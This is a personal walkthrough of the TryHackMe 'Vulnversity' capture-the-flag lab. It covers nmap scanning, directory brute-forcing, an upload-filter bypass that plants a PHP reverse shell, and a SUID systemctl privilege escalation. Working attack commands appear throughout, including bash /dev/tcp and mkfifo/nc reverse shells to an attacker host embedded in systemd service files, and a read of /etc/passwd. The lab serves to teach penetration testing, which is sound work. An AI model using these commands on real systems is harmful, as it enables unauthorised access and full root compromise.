TryHackMe: vulnversity

[Task 1] Deploy the machine

[Task 2] Reconnaissance
Cheat sheet reference:

1–3. Scan box:

nmap -sV <machines ip>

4. How many ports will nmap scan if the flag -p-400 was used?

5. Using the nmap flag -n what will it not resolve?
ANS: dns

6. What is the most likely operating system this machine is running?
I’ll use this command once and for all

nmap -A -T5 <ip> -vv

7. What port is the web server running on?
ANS: It’s in #1

8. Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)

Using nmap vuln script

nmap --script vuln <ip>

Scan high ports

nmap -T5 -p- -vv <ip>

Telnet to ftp

telnet <ip> <port no.>


ssh <ip>

Explore http site
Try to click every function/button, nothing so far

View source, nothing so far

Inspect sources and network. Now I know that this site is JS application.

There’re 5 tcp ports on this server.
Port 3333 with httpd service has a JS web app.

[Task 3] Locating directories using GoBuster

  1. Lets first start of by scanning the website to find any hidden directories. To do this, we’re going to use GoBuster.
gobuster dir -u http://<ip>:3333/ -w rockyou.txt

It’s too slow, I will user dirbuster instead.

Access each directories and I find something in “internal” and “internal/uploads”.

2. What is the directory that has an upload form page?
ANS: It’s in #1.

[Task 4] Compromise the webserver

  1. Try upload a few file types to the server, what common extension seems to be blocked?
    I uploaded php reverse shell, but it was not allowed.

2. To identify which extensions are not blocked, we’re going to fuzz the upload form.

Intercept traffic with Burp Suite

Right-click and send to Intruder

At payload options, create list

At position, clear all $ and add $ as highlited

Start attack

I don’t see the difference, I’ll try it manually.

Upload “reverse_shell.phtml”


Verify upload result in “/internal/uploads/”

At the attacker’s machine, type

nc -lvp 1234

Click at the uploaded file

Back to the attacker’ machine, we have a shell.

3. We’re going to use Intruder (used for automating customised attacks).
— skipped, I already done in #2

4. Now we know what extension we can use for our payload we can progress.
ANS: It’s in #2.

5. What user was running the web server?

cat /etc/passwd

6. What is the user flag?

cd /home/billls
cat user.txt

[Task 5] Privilege Escalation

  1. On the system, search for all SUID files. What file stands out?
find / -perm -u=s -type f 2>/dev/null

2. Become root and get the last flag (/root/root.txt)


read “root.txt”

eop=$(mktemp).serviceecho '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]' >$eop
/bin/systemctl link $eop
/bin/systemctl enable --now $eop
cd /tmp
cat output

3. Finally, let’s get root privilege


Try Bash

eop=$(mktemp).serviceecho '[Service]
ExecStart=/bin/sh -c "bash -i >& /dev/tcp/<ip>/8080 0>&1"
[Install]' >$eop

Back to attacker’s machine

nc -lvp 8080

Back to victim’s machine

/bin/systemctl link $eop
/bin/systemctl enable --now $eop

Not work!!!

Try Netcat

eop=$(mktemp).serviceecho '[Service]
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 8080 >/tmp/f"
[Install]' >$eop

Back to attacker’s machine

nc -lvp 8080

Back to victim’s machine

/bin/systemctl link $eop
/bin/systemctl enable --now $eop

Back to attacker’s machine, It’s work